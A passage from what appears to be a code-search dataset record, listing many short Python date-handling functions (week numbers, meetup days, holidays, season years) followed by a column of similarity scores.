datetime.timedelta(daysahead)", "def first_day_of_month():\n first_object = datetime.utcnow()\n first_string = first_object.strftime('%m/01/%Y')\n return first_string", "def get_year_half_start(x: Optional[Date] = None) -> Date:\n asof = x or get_today()\n return asof.replace(month=((asof.month - 1) // 6) * 6 + 1, day=1)", "def week_of_month(dt):\n try:\n first_day = dt.replace(day=1)\n dom = dt.day\n if first_day.weekday() == 6:\n adjusted_dom = dom + day_of_week(dt) - 1\n else:\n adjusted_dom = dom + day_of_week(dt)\n return int(ceil(adjusted_dom/7.0))\n except Exception as e:\n log.exception(\"1;EME;FAILURE;700; FUNCTION ERROR \" + str(e), exc_info=False)\n sys.exit(0)", "def calculate_date(month, year):\n start_index = day_of_week(1, month, year)\n end_index = num_of_day(month, year)\n padding_day = [0 for i in range(0, start_index)]\n days = [i for i in range(1, end_index + 1)]\n return padding_day + days", "def meetup_day(year, month, dow, wom):\n first_dow = monthrange(year, month)[0]\n days_in_month = monthrange(year, month)[1]\n possible_dates = []\n print str(year) + str(month) + dow + wom\n\n \"\"\"Build dictionary of possible dates based on dow\"\"\"\n for day in range(1, days_in_month+1):\n if datetime.date(year, month, day).strftime(\"%A\") == dow:\n print day\n possible_dates.extend([day])\n\n \"\"\"Perform logic on wom constraint\"\"\"\n if wom == \"teenth\":\n for day in possible_dates:\n if day > 12 and day < 20:\n return datetime.date(year, month, day)\n elif wom == \"last\":\n return datetime.date(year, month, possible_dates[-1])\n else:\n return datetime.date(year, month, possible_dates[ int(wom[:1]) - 1 ])", "def Anchor_day(year):\r\n day = (5 * ((year // 100) % 4) + 2) % 7\r\n return day", "def get_year_start(x: Optional[Date] = None) -> Date:\n return (x or get_today()).replace(month=1, day=1)", "def _calculate_date(day_of_year):\n date = datetime.datetime.strptime(str(day_of_year), '%j')\n return date.strftime('%d-%b')", "def minyear():\n\n return datetime.MINYEAR", "def distributeWeekday(self, jan1):\n self.firstday = jan1\n for day in self.daylist:\n if jan1%7 == 6 or jan1%7 == 0:\n day.weekday = 'weekend'\n jan1 = jan1 + 1", "def current_season():\n td = datetime.datetime.today()\n if td.month > 8:\n return td.year\n return td.year - 1", "def get_next_hockey_year(year=None):\n\n today = date.today()\n\n # if we are in the end of a hockey year (anytime from jan 1 until next season \"sept\")\n if today.month <= 8:\n return get_current_year() + get_next_year()\n\n else: # if month >= 9 (Sept)\n next_year = get_next_year()\n return next_year + get_next_year(year=next_year)", "def yearMonthDay() :\n timeDateValue = time.asctime(time.gmtime()).lower().split()\n if int(timeDateValue[2]) < 10 : timeDateValue[2] = str('0'+str(timeDateValue[2]))\n return '%s%s%s' % (timeDateValue[4],timeDateValue[1],timeDateValue[2])", "def print_month(first_day, month, year):\n print_month_header(month)\n days = days_in_month(month, year)\n\n # Print leading space before the first day in this month\n for i in range(first_day):\n print(\" \", end=\"\") # four spaces per day\n\n # Print numbers for all the days in the month\n for i in range(0, days):\n print(format_number(i + 1), end=\"\")\n # Add a new line at end of the week\n if ((first_day + i) % NUM_DAYS_IN_WEEK) == (NUM_DAYS_IN_WEEK - 1):\n print(\"\")\n # Add a new line at the end of the month\n print(\"\")\n\n # Return day of week for first day for the month after this one\n return (first_day + days) % NUM_DAYS_IN_WEEK", "def 
test_monday(self):\n date = datetime.date(1981, 5, 4)\n self.assertEqual(date.isoweekday(), 1)\n start_date, end_date = get_weekspan(date)\n self.assertEqual(start_date.isoweekday(), 1)\n self.assertEqual(end_date.isoweekday(), 7)\n self.assertTrue(start_date.toordinal() <= date.toordinal() <= end_date.toordinal())", "def meetup_day(year, month, day_of_week, day_occurrence):\n \n cal = calendar.monthcalendar(year, month)\n day_of_week_index = days_of_week[day_of_week]\n \n not_teenth = day_occurrence != 'teenth'\n day_is_in_first_week = cal[0][day_of_week_index] != 0\n \n if not_teenth and day_is_in_first_week:\n week_index = week_indices[day_occurrence]\n \n elif not_teenth and not day_is_in_first_week:\n week_index = week_indices[day_occurrence] + 1\n \n else:\n for i in range(len(cal)):\n if cal[i][day_of_week_index] >= 10:\n week_index = i\n break\n\n date = cal[week_index][day_of_week_index]\n return datetime.date(year, month, date)", "def get_week_start(x: Optional[Date] = None) -> Date:\n asof = x or get_today()\n return asof - TimeDelta(days=(asof.isoweekday() - 1) % 7)", "def MLK(year):\n\n day = datetime.date(year, 1, 1)\n count = 0\n while True:\n if day.weekday() == 0:\n count += 1\n if count == 3:\n return day\n day += datetime.timedelta(days=1)", "def workweeks(yr):\n\n # TODO: MOVE all of this crap into a intelDateTime.py module. Does not belong here. JSS\n\n nyd = datetime.date(yr, 1, 1).weekday() # Determine the day of the week on which the 1st of January fell this year.\n if nyd == 5: return 53 # If the 1st of January fell on a Saturday, the year has 53 weeks.\n if nyd == 4 and isleapyear(yr): return 53 # Same deal if the 1st of January fell on a Friday in a leap year.\n return 52 # All other years have 52 work weeks.", "def day_of_year(date=datetime.datetime.now()):\n return date.strftime(\"Its the %j day of %Y'th year.\")", "def day_of_week(self):\n # 1 Jan 0001 was Monday according to the proleptic Gregorian calendar.\n # So, 1 Jan 0001 has ordinal 1, and the weekday is 0.\n return (self._ordinals - 1) % 7", "def get_first_date(in_month=1):\n\n from_date = (today-relativedelta(months=in_month)).replace(day=1)\n \n return from_date", "def thanksgiving(year, country='usa'):\n if country == 'usa':\n if year in [1940, 1941]:\n return nth_day_of_month(3, THU, NOV, year)\n elif year == 1939:\n return nth_day_of_month(4, THU, NOV, year)\n\n return nth_day_of_month(0, THU, NOV, year)\n\n if country == 'canada':\n return nth_day_of_month(2, MON, OCT, year)\n\n raise NotImplementedError('Unsupported argument for country')", "def get_month_start(x: Optional[Date] = None) -> Date:\n return (x or get_today()).replace(day=1)", "def start(year, month, day):\n output=datetime.datetime(year, month, day)\n return output", "def ceil_start_month(date):\n if date.month == 12:\n date = datetime(date.year + 1, 1, 1)\n else:\n date = datetime(date.year, date.month + 1, 1)\n return date", "def doomsday(y):", "def day_of_the_week(arg):", "def next_week_start(iso_date: Optional[str] = None) -> date:\n if iso_date:\n current_date = date.fromisoformat(iso_date)\n else:\n current_date = date.today()\n\n days_until_monday = 7 - current_date.weekday()\n\n candidate_start = current_date + timedelta(days=days_until_monday)\n while candidate_start in holidays.US():\n candidate_start += timedelta(days=1)\n\n return candidate_start", "def get_week_of_year(date, padded_or_unpadded, start_Sunday_or_Monday):\n if start_Sunday_or_Monday == constants.str_Sunday:\n week_of_year = date.strftime('%U')\n elif 
start_Sunday_or_Monday == constants.str_Monday:\n week_of_year = date.strftime('%W')\n else:\n err_msg = str_possible_values('start_Sunday_or_Monday', [\n constants.str_Sunday, constants.str_Monday])\n raise ValueError(err_msg)\n\n if padded_or_unpadded == constants.str_padded:\n return week_of_year\n elif padded_or_unpadded == constants.str_unpadded:\n return str(int(week_of_year))\n else:\n err_msg = str_possible_values('padded_or_unpadded', [\n constants.str_padded, constants.str_unpadded])\n raise ValueError(err_msg)", "def date_to_day_of_year(year, month, day):\n # If month is January, just return the day.\n if month == 1:\n return day\n # Accumulate days from all months prior to the specified month.\n num_days = 0\n for i in range(1, month):\n num_days += ABBREV_MONTH_NUM_DAYS_PAIRS[i - 1][1]\n # Maybe add a leap day.\n if month > 2 and is_leap_year(year):\n num_days += 1\n # Return the sum of day and prior months' days.\n return num_days + day", "def yearlysection(month=1, day=1, hour=0, minute=0, second=0):\n return datetime.datetime(datetime.MINYEAR,\n month=month, day=day,\n hour=hour, minute=minute, second=second)", "def main():\n print(day_of_week(datetime.now()))\n print(day_of_week(datetime(2019, 7, 4)))\n print(day_of_week(datetime(2013, 12, 25)))\n print(day_of_week(datetime(2000, 1, 1)))", "def date_to_dow(y, m, d):\r\n # Python uses Monday week start, so wrap around\r\n w = calendar.weekday(y, m, d) + 1\r\n if w == 7:\r\n w = 0\r\n return w", "def convert_date(year: str, week: str):\n date = datetime.fromisocalendar(int(year), int(week), 1)\n return date.strftime(\"%m/%d/%YZ\")", "def get_week_from_date(date) -> int:\n month, year = date.month, date.year\n if month < 4:\n year -= 1\n ld = _labor_day(year)\n wk1_wed = ld + timedelta(days=2)\n days_since = (date - wk1_wed).days\n weeks_since = days_since / 7.\n week = math.floor(weeks_since) + 1\n return int(week)", "def current_season_week(sched=None):\n if sched is None or sched.empty:\n sched = schedule()\n td = datetime.datetime.today()\n seas = current_season()\n week_starts = sched.loc[sched.season == seas, :].groupby('week')['gameday'].min()\n this_week = week_starts.loc[week_starts < td].max()\n return week_starts.loc[week_starts == this_week].index.values[0]", "def next_month(year, month):\n if month < 12:\n month += 1\n else:\n month = 1\n year += 1\n return year, month", "def weekday(day):\n return (day % 7) - 1", "def get_current_hockey_year_start():\n\n today = date.today()\n\n # if we are in the end of a hockey year (anytime from jan 1 until next season \"sept\")\n if today.month <= 8:\n return get_last_year()\n\n else: # if month >= 9 (Sept)\n return get_current_year()", "def day_of_year(self):\n return int(self.date.strftime('%j'))", "def current_season() -> int:\n now = datetime.now()\n month, year = now.month, now.year\n if month < 4:\n year -= 1\n return year", "def getWaterYear(date):\n\n year = date.year\n yearstring = \"{}/{}\"\n if date.month >= 10:\n return yearstring.format(year, year + 1)\n else:\n return yearstring.format(year - 1, year)", "def weeks_per_year(year):\n return week_from_date(date(year, 12, 31))", "def day_of_year(month, day):\n try:\n # 2003 is an arbitrary non-leap year.\n return date(2003, month, day).timetuple().tm_yday\n except ValueError:\n if month == 2 and day == 29:\n return 60\n else:\n raise", "def day_07_b() -> int:\n return 0", "def indigenous_peoples_day(year, country='usa'):\n if country == 'usa':\n return nth_day_of_month(2, MON, OCT, year)\n\n return (year, OCT, 
12)", "def nextDay(year, month, day):\n if day < 30:\n day += 1\n else:\n if month < 12:\n month += 1\n day = 1\n else:\n year += 1\n month = 1\n day = 1\n \n return(year, month, day)", "def get_weekday():\n result = datetime.today().weekday() + 1\n return result", "def find_day_of_week(year, month, day_of_week, offset=0, use_datetime=False):\n iter = Calendar().itermonthdates(year, month)\n n = 0\n\n for value in iter:\n if month != value.month:\n continue\n\n if day_of_week == weekday(value.year, value.month, value.day):\n if n == offset:\n return convert_date_to_datetime(value) if use_datetime else value\n else:\n n += 1\n\n return None", "def day_of_the_programmer(year):\n leap, total = 0, 256\n\n #Determine Leap Years\n if year <= 1917 and year >= 1700: # Julian calendar\n if year % 4 == 0:\n leap = 1\n elif year == 1918:\n leap = -13\n elif year >= 1919 and year <= 2700: # Gregorian Calendar\n if year % 400 == 0 or (year % 4 == 0 and year % 100 != 0):\n leap = 1\n\n days_in_month = [31, 28 + leap, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n\n # Determine month and day\n for i in xrange(len(days_in_month)):\n total -= days_in_month[i]\n if total < 1:\n month = i + 1\n day = total + days_in_month[i]\n break\n\n # format output into 'dd.mm.yyyy'\n day = '{:02d}'.format(day)\n month = '{:02d}'.format(month)\n yyyy = '{:04d}'.format(year)\n return day + '.' + month + '.' + yyyy", "def weekly():", "def date_to_week(y, m, d):\r\n return datetime.datetime(y, m, d).strftime(r'%YW%W')", "def get_day_of_week(year: int, dow: int) -> List[date]:\n new_year = date(year, 1, 1)\n start_date = new_year + timedelta(days=dow - new_year.weekday())\n start_date = start_date + timedelta(days=7) if start_date < new_year else start_date\n\n dates = []\n while start_date.year == year:\n dates.append(start_date)\n start_date += timedelta(days=7)\n return dates", "def getPinnedDayOfNextMonth(year, month, day):\n\tyear = year + (month / 12) # purposeful integer division\n\tmonth = (month % 12) + 1\n\tday = pinDayToMonth(year, month, day)\n\treturn datetime.date(year, month, day)", "def latest_season_before(date):\n\tif date.month < 9:\n\t\treturn date.year - 1\n\treturn date.year", "def nth_dow_to_day(tupel, y):\r\n m = tupel[0]\r\n dow = tupel[1]\r\n n = tupel[2]\r\n\r\n if dow == 7:\r\n dow = 0\r\n\r\n first_dow = date_to_dow(y, m, 1) # the dow of the first of the month\r\n shift = dow - first_dow\r\n if shift < 0:\r\n shift += 7\r\n\r\n return shift + (7 * n) - 6", "def adjust_year(date_obj):\n today = date.today()\n if today.month == 12:\n if date_obj.month == 1:\n return date_obj.replace(year=today.year + 1)\n return date_obj.replace(year=today.year)", "def increment_year_month(year, month):\n month += 1\n if month == 13:\n year += 1\n month = 1\n return year, month", "def pick_month():\n today = date.today()\n month = date(today.year, today.month, 1)\n if today.day < 14:\n # Use last month\n month -= timedelta(days=27)\n while month.day != 1:\n month -= timedelta(days=1)\n return month", "def twenty_seventeen():\n return 2017", "def get_weekday_number(date):\n return date.strftime('%w')", "def get_business_day_of_month_before(year, month, day):\n try:\n adate = datetime.datetime(year, month, day)\n except ValueError:\n try:\n adate = datetime.datetime(year, month, 30)\n except ValueError:\n try:\n adate = datetime.datetime(year, month, 29)\n except ValueError:\n adate = datetime.datetime(year, month, 28)\n r = rrule.rrule(\n rrule.MONTHLY, byweekday=(rrule.MO, rrule.TU, rrule.WE, rrule.TH, rrule.FR),\n 
dtstart=datetime.datetime(year, month, 1))\n res = r.before(adate, inc=True)\n if (res is None or res.month != month or res.year != year):\n raise ValueError(\"No dates found in range. is there a flaw in your logic?\")\n return res.date()", "def week(self):\n J = self.JulianDay()\n d4 = (J + 31741 - (J % 7)) % 146097 % 36524 % 1461\n L = d4 // 1460\n d1 = ((d4 - L) % 365) + L\n return d1 // 7 + 1", "def nextDay(year, month, day):\n if day < daysInMonth(year,month):\n return year, month, day + 1\n else:\n if month == 12:\n return year + 1, 1, 1\n else:\n return year, month + 1, 1", "def dia_revolucion(year):\n return nth_day_of_month(3, MON, NOV, year)", "def DATE(year, month, day):\n if year < 1900:\n year += 1900\n norm_month = (month - 1) % 12 + 1\n norm_year = year + (month - 1) // 12\n return datetime.date(norm_year, norm_month, 1) + datetime.timedelta(days=day - 1)", "def day_of_month():\n return datetime.date.today().day", "def find_day_of_year(year, month, day):\n\n leap_flag = year % 4 == 0\n feb_days = np.where(leap_flag, 29, 28)\n days_per_month = np.array([31, feb_days, 31, 30, 31, 30, 31, 31,\n 30, 31, 30, 31])\n return np.sum(days_per_month[0:month-1]) + day - 1", "def countSundaysFirstOfMonth(startYear, endYear):\n\tdayOfWeek = 1\n\tnumSundays = 0\n\tfor year in xrange(1900, endYear + 1):\n\t\tfor month in xrange(1, 13):\n\t\t\tif year >= startYear and dayOfWeek == 0:\n\t\t\t\tnumSundays += 1\n\t\t\tdayOfWeek += numDays(month, year)\n\t\t\tdayOfWeek %= 7\n\treturn numSundays", "def date_day_of_month(date):\n return date.day", "def next_day_of_week(current, day_of_week):\n\n while current.weekday() != day_of_week:\n current += timedelta(1)\n return current" ]
[ "0.74452096", "0.7358948", "0.71944577", "0.6750746", "0.66948074", "0.6441872", "0.63434887", "0.6304483", "0.6295698", "0.6277809", "0.62662905", "0.62631595", "0.6171451", "0.6164381", "0.6106714", "0.60991955", "0.60991955", "0.6070933", "0.60079587", "0.59685105", "0.59345454", "0.59336", "0.5899373", "0.5886059", "0.58811253", "0.58055943", "0.5798165", "0.5751986", "0.57394296", "0.5728061", "0.57145005", "0.57094467", "0.5706808", "0.568835", "0.56848973", "0.5681779", "0.5677155", "0.5662916", "0.56410563", "0.5620512", "0.5596713", "0.5596077", "0.55912936", "0.5587555", "0.557419", "0.5571951", "0.5553572", "0.5551966", "0.5536897", "0.5524497", "0.55193126", "0.54795945", "0.54538137", "0.54520446", "0.54338026", "0.54267585", "0.54226166", "0.5398363", "0.5388697", "0.53845835", "0.5383154", "0.5381845", "0.5358328", "0.535351", "0.5342051", "0.53308904", "0.5321841", "0.5310505", "0.53057534", "0.52951133", "0.52901024", "0.52876866", "0.5287507", "0.5286121", "0.52764684", "0.5256523", "0.5236005", "0.5232269", "0.52169436", "0.52164644", "0.5214625", "0.5212777", "0.52108985", "0.519237", "0.5176465", "0.51733977", "0.51637477", "0.5158382", "0.5151391", "0.51505935", "0.5127659", "0.51266754", "0.5111498", "0.5088184", "0.50872296", "0.50863886", "0.5085841", "0.5078016", "0.50613874", "0.50456303" ]
0.64837617
5
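The first snippet in the negatives list above asks "why not use date.isocalendar() from the stdlib?" instead of the hand-rolled `date_trunc`-based week count. A plausible reason is that the two schemes disagree near year boundaries: `isocalendar()` uses ISO-8601 numbering, where the ISO year can differ from the calendar year. A minimal illustration of the stdlib route (the wrapper name `iso_week` is hypothetical, not from the dataset):

```python
import datetime

def iso_week(d: datetime.date) -> tuple:
    # isocalendar() returns (ISO year, ISO week, ISO weekday).
    # Return (week, year) to match the snippet's documented order.
    iso_year, iso_week_num, _ = d.isocalendar()
    return iso_week_num, iso_year

# Jan 1, 2016 fell on a Friday, so in ISO terms it belongs to
# week 53 of 2015; a Monday-start count within the calendar year
# would give a different answer.
print(iso_week(datetime.date(2016, 1, 1)))  # -> (53, 2015)
```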
Get NFL week (ESPN scoring period) from date

The year of the given date determines the relevant NFL season. Assumes week 1 begins the week of Labor Day and ends the following Wednesday. Does not cap value, so may be below 1 or above 17.
def get_week_from_date(date) -> int:
    month, year = date.month, date.year
    if month < 4:
        year -= 1
    ld = _labor_day(year)
    wk1_wed = ld + timedelta(days=2)
    days_since = (date - wk1_wed).days
    weeks_since = days_since / 7.
    week = math.floor(weeks_since) + 1
    return int(week)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_week(date):\n\n # TODO: the API seems broken. It returns week, year not year, week as documentef\n # why not use date.isocalendar() from the stdlib?\n\n date = date_trunc('week', date)\n\n first_monday = date_trunc('week', date_trunc('year', date))\n if first_monday.year < date.year:\n first_monday += datetime.timedelta(weeks=1)\n diff = date_trunc('day', date) - first_monday\n week = 1 + (diff.days / 7)\n return week, first_monday.year", "def ISOWEEKNUM(date):\n return _make_datetime(date).isocalendar()[1]", "def GetWeekNum(self, date):\n (y, m, d) = date.split('-')\n return (dt.date(int(y), int(m), int(d)) - self.START_DATE).days / 7", "def weeks_per_year(year):\n return week_from_date(date(year, 12, 31))", "def workweeks(yr):\n\n # TODO: MOVE all of this crap into a intelDateTime.py module. Does not belong here. JSS\n\n nyd = datetime.date(yr, 1, 1).weekday() # Determine the day of the week on which the 1st of January fell this year.\n if nyd == 5: return 53 # If the 1st of January fell on a Saturday, the year has 53 weeks.\n if nyd == 4 and isleapyear(yr): return 53 # Same deal if the 1st of January fell on a Friday in a leap year.\n return 52 # All other years have 52 work weeks.", "def ISOWEEKNUM(\n date: func_xltypes.XlDateTime\n) -> func_xltypes.XlNumber:\n\n datetime_date = utils.number_to_datetime(int(date))\n isoweeknum = datetime_date.isocalendar()[1]\n return isoweeknum", "def week(self):\n J = self.JulianDay()\n d4 = (J + 31741 - (J % 7)) % 146097 % 36524 % 1461\n L = d4 // 1460\n d1 = ((d4 - L) % 365) + L\n return d1 // 7 + 1", "def date_week_of_year(date, *, sunday_is_first_day_of_week: bool = False):\n if sunday_is_first_day_of_week:\n return date.strftime(\"%U\")\n else:\n return date.strftime(\"%V\")", "def get_week_from_datestr(datestr: str) -> int:\n return date.fromisoformat(datestr).isocalendar()[1]", "def get_week_of_year(date, padded_or_unpadded, start_Sunday_or_Monday):\n if start_Sunday_or_Monday == constants.str_Sunday:\n week_of_year = date.strftime('%U')\n elif start_Sunday_or_Monday == constants.str_Monday:\n week_of_year = date.strftime('%W')\n else:\n err_msg = str_possible_values('start_Sunday_or_Monday', [\n constants.str_Sunday, constants.str_Monday])\n raise ValueError(err_msg)\n\n if padded_or_unpadded == constants.str_padded:\n return week_of_year\n elif padded_or_unpadded == constants.str_unpadded:\n return str(int(week_of_year))\n else:\n err_msg = str_possible_values('padded_or_unpadded', [\n constants.str_padded, constants.str_unpadded])\n raise ValueError(err_msg)", "def WEEKNUM(date, return_type=1):\n if return_type == 21:\n return ISOWEEKNUM(date)\n if return_type not in _weekday_type_map:\n raise ValueError(\"Invalid return type %s\" % (return_type,))\n (first, index) = _weekday_type_map[return_type]\n date = _make_datetime(date)\n jan1 = datetime.datetime(date.year, 1, 1)\n week1_start = jan1 - datetime.timedelta(days=(jan1.weekday() - first) % 7)\n return (date - week1_start).days // 7 + 1", "def WeekCount(year):\n weekday = DayOfWeek(year, 1, 1)\n if weekday == 4:\n return 53\n elif weekday == 3 and LeapYear(year):\n return 53\n else:\n return 52", "def current_week_number(date=datetime.datetime.now()):\n return int(date.strftime(\"%W\"))", "def wkday_on_first(yr, mon): # returns day of week of first of month of the given year (1/1/2016)\r\n TotalDays = 0\r\n for x in range(1754, yr):\r\n YearNum = yeardays(x)\r\n TotalDays += YearNum\r\n for x in range(1, mon):\r\n MonNum = monthdays(yr, x)\r\n TotalDays += MonNum\r\n WhatDayNum 
= TotalDays % 7\r\n WhatDay = [\"Tues\", \"Wedn\", \"Thu\", \"Fri\", \"Sat\", \"Mon\"]\r\n return WhatDay[WhatDayNum]", "def get_week_days(year, week):\n d = dt.date(year, 1, 1)\n if(d.weekday() > 3):\n d = d + dt.timedelta(7 - d.weekday())\n else:\n d = d - dt.timedelta(d.weekday())\n dlt = dt.timedelta(days = (week - 1) * 7)\n return d + dlt #, d + dlt + dt.timedelta(days = 6)", "def nflweek(self, irc, msg, args, optlist, optweek):\n \n url = self._b64decode('aHR0cDovL3MzLmFtYXpvbmF3cy5jb20vbmZsZ2MvYWxsU2NoZWR1bGUuanM=')\n \n usePre, useNext, outputWeek = False, False, False\n for (option, arg) in optlist:\n if option == 'pre':\n usePre = True\n \n if optweek:\n if optweek == \"next\":\n useNext = True\n elif optweek.isdigit():\n if usePre: \n if 1 <= int(optweek) <= 4:\n outputWeek = \"Preseason Week %s\" % optweek\n else:\n irc.reply(\"ERROR: Preseason week number must be between 1 and 4.\")\n return\n else:\n if 1 <= int(optweek) <= 17:\n outputWeek = \"Week %s\" % optweek\n else:\n irc.reply(\"ERROR: Week must be between 1-17\")\n return \n\n try:\n req = urllib2.Request(url)\n html = (urllib2.urlopen(req)).read()\n except:\n irc.reply(\"Failed to open: %s\" % url)\n return\n \n jsondata = json.loads(html)\n\n week = jsondata.get('week', None) # work with the week data so we know where we are.\n\n if week is None:\n irc.reply(\"Failed to load schedule.\")\n return\n\n currentWeekName = week.get('current', {'current': None}).get('weekName', None) \n nextWeekName = week.get('next', {'next': None}).get('weekName', None) \n\n if currentWeekName is None:\n irc.reply(\"Cannot figure out the current week.\")\n return\n\n games = jsondata.get('content', None) # data in games.\n \n if games is None:\n irc.reply(\"Failed to load the games data.\")\n return\n \n if outputWeek:\n games = [item['games'] for item in games if item['weekName'] == outputWeek]\n weekOutput = outputWeek\n elif useNext:\n games = [item['games'] for item in games if item['weekName'] == nextWeekName]\n weekOutput = nextWeekName\n else:\n games = [item['games'] for item in games if item['weekName'] == currentWeekName]\n weekOutput = currentWeekName\n \n append_list = []\n\n for games in games:\n for t in games:\n awayTeam = self._translateTeam('team', 'nid', t['awayTeamId'])\n homeTeam = self._translateTeam('team', 'nid', t['homeTeamId'])\n append_list.append(\"[\" + t['date']['num'] + \"] \" + awayTeam + \"@\" + homeTeam + \" \" + t['date']['time'])\n \n descstring = string.join([item for item in append_list], \" | \")\n output = \"{0} :: {1}\".format(ircutils.bold(weekOutput), descstring)\n \n irc.reply(output)", "def week(self):\n if self._week.lower() == 'wild card':\n return WILD_CARD\n if self._week.lower() == 'division':\n return DIVISION\n if self._week.lower() == 'conf. 
champ.':\n return CONF_CHAMPIONSHIP\n if self._week.lower() == 'superbowl':\n return SUPER_BOWL\n return self._week", "def getWeeks(year):\n url = \"http://www.boxofficemojo.com/weekend/?yr=%d\" % year\n src = urllib.request.urlopen(url).read()\n soup = BeautifulSoup(src, 'html.parser')\n chart = soup.find(border=\"0\", cellspacing=\"1\", cellpadding=\"5\")\n data = parseTable(chart)\n weeks = [int(row[-1]) for row in data[1:]]\n return weeks", "def date_to_day_of_week(date):\n return date.weekday()", "def get_week_start(x: Optional[Date] = None) -> Date:\n asof = x or get_today()\n return asof - TimeDelta(days=(asof.isoweekday() - 1) % 7)", "def get_weekday_number(date):\n return date.strftime('%w')", "def day_of_week(day, month, year):\n bias = (14 - month) // 12\n m_year = year - bias\n mth = month + 12 * bias - 2\n return (day + m_year + m_year // 4 - m_year // 100 + m_year // 400 + (31 * mth) // 12) % 7", "def week_range(date):\n # isocalendar calculates the year, week of the year, and day of the week.\n # dow is Mon = 1, Sat = 6, Sun = 7\n year, week, dow = date.isocalendar()\n\n # Find the first day of the week.\n if dow == 7:\n # Since we want to start with Sunday, let's test for that condition.\n start_date = date\n else:\n # Otherwise, subtract `dow` number days to get the first day\n start_date = date - timedelta(dow)\n\n return start_date, start_date + timedelta(6)", "def weekNumber(self): # real signature unknown; restored from __doc__\r\n pass", "def next_week_start(iso_date: Optional[str] = None) -> date:\n if iso_date:\n current_date = date.fromisoformat(iso_date)\n else:\n current_date = date.today()\n\n days_until_monday = 7 - current_date.weekday()\n\n candidate_start = current_date + timedelta(days=days_until_monday)\n while candidate_start in holidays.US():\n candidate_start += timedelta(days=1)\n\n return candidate_start", "def weekly():", "def first_day_of_year(year):\n year -= 1\n return (year + (year // 4) - (year // 100) + (year // 400) + 1) % NUM_DAYS_IN_WEEK", "def GetWeekDay(self):\n if self.day is None:\n if self.week:\n return (\n self.century,\n self.year //\n 10,\n self.year %\n 10,\n self.week,\n None)\n elif self.month is None:\n if self.year is None:\n return (self.century, None, None, None, None)\n else:\n return (\n self.century,\n self.year //\n 10,\n self.year %\n 10,\n None,\n None)\n else:\n raise DateTimeError(\"can't get week day with month precision\")\n else:\n century, year, ordinalDay = self.GetOrdinalDay()\n year += century * 100\n if LeapYear(year):\n yearLength = 366\n else:\n yearLength = 365\n weekday = DayOfWeek(year, self.month, self.day)\n thursday = ordinalDay + 4 - weekday\n if thursday < 1:\n # Thursday this week was actually last year, and so we are\n # part of the last calendar week of last year too.\n # may return year==0\n year -= 1\n week = WeekCount(year)\n elif thursday > yearLength:\n # Thursday this week is actually next year, and so we are\n # part of the first calendar week of next year too.\n # may return century=100\n year += 1\n week = 1\n else:\n # We are part of this year, but which week?\t Jan 4th is always\n # part of the first week of the year, so we calculate the ordinal\n # value of the Monay that began that week\n yearBase = 5 - DayOfWeek(year, 1, 4)\n week = (ordinalDay - yearBase) // 7 + 1\n return year // 100, (year % 100) // 10, (year % 10), week, weekday", "def _DayNumToWeekdayNum(daynum):\n return (daynum + _WEEKDAY_BASE) % NUM_WEEKDAYS", "def get_next_week(self, startdate):\n dow_today = 
int(datetime.datetime.strftime(startdate, '%w'))\n days_until_sunday = 7 - ((dow_today + 7) % 7)\n #days_until_sunday = 7 - (dow_today + 1)\n sunday = startdate + datetime.timedelta(days=days_until_sunday)\n following_saturday = sunday + datetime.timedelta(days=6)\n next_week = (sunday, following_saturday)\n return next_week", "def day_of_week(self):\n # 1 Jan 0001 was Monday according to the proleptic Gregorian calendar.\n # So, 1 Jan 0001 has ordinal 1, and the weekday is 0.\n return (self._ordinals - 1) % 7", "def DayOfWeek(year, month, day):\n num = year * 365\n num = num + year // 4 + 1\n num = num - (year // 100 + 1)\n num = num + year // 400 + 1\n if month < 3 and LeapYear(year):\n num = num - 1\n return (num + MONTH_OFFSETS[month - 1] + day + 4) % 7 + 1", "def sacred_wednesdays(g_year):\n return sacred_wednesdays_in_range(GregorianDate.year_range(g_year))", "def latest_season_before(date):\n\tif date.month < 9:\n\t\treturn date.year - 1\n\treturn date.year", "def current_week(self):\n\n if not self.iso_equal() and self.time_stamp.weekday() == 6:\n return self.time_stamp_iso[1] + 2\n if not self.iso_equal() or self.time_stamp.weekday() == 6:\n return self.time_stamp_iso[1] + 1 \n return self.time_stamp_iso[1]", "def date_to_week(y, m, d):\r\n return datetime.datetime(y, m, d).strftime(r'%YW%W')", "def WEEKDAY(date, return_type=1):\n if return_type not in _weekday_type_map:\n raise ValueError(\"Invalid return type %s\" % (return_type,))\n (first, index) = _weekday_type_map[return_type]\n return (_make_datetime(date).weekday() - first) % 7 + index", "def get_week_date():\n return timezone.now()+timezone.timedelta(days=6)", "def main():\n print(day_of_week(datetime.now()))\n print(day_of_week(datetime(2019, 7, 4)))\n print(day_of_week(datetime(2013, 12, 25)))\n print(day_of_week(datetime(2000, 1, 1)))", "def date_day_of_week(date):\n day_of_week = date.strftime('%A')\n return day_of_week", "def nineteen():\r\n \r\n # Julian dates for January 1, 1901 and January 1, 2001\r\n start = 2415385\r\n end = 2451910\r\n \r\n years = 100\r\n months = 12\r\n monthDays = {1: 31, 2: 28, 3: 31, 4: 30, 5: 31, 6: 30, 7: 31, 8: 31, 9: 30, 10: 31, 11: 30, 12: 31}\r\n leapDays = {1: 31, 2: 29, 3: 31, 4: 30, 5: 31, 6: 30, 7: 31, 8: 31, 9: 30, 10: 31, 11: 30, 12: 31}\r\n \r\n dateRange = end - start\r\n \r\n total = 0\r\n sundays = 0\r\n \r\n for year in range(years):\r\n for i in range(months):\r\n a = i + 1\r\n if (year + 1) % 4 == 0: \r\n for j in range(leapDays[a]):\r\n total += 1\r\n if j == 0 and total % 7 == 6:\r\n sundays += 1\r\n else:\r\n for j in range(monthDays[a]):\r\n total += 1\r\n if j == 0 and total % 7 == 6:\r\n sundays += 1 \r\n \r\n return sundays", "def getSeason(date):\n\n date = validate.timestamp(date)\n day = date.dayofyear\n leap_year = int(date.is_leap_year)\n\n spring = numpy.arange(80, 172) + leap_year\n summer = numpy.arange(172, 264) + leap_year\n autumn = numpy.arange(264, 355) + leap_year\n\n if day in spring:\n season = \"spring\"\n elif day in summer:\n season = \"summer\"\n elif day in autumn:\n season = \"autumn\"\n else:\n season = \"winter\"\n\n return season", "def current_week() -> int:\n now = datetime.now()\n return get_week_from_date(now)", "def dow(self):\n comparator = Date(11, 12, 2014) # known to be a 'Wednesday'\n DOW = ['Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday', 'Monday', 'Tuesday']\n diff = self.diff(comparator)\n return DOW[diff % 7]", "def 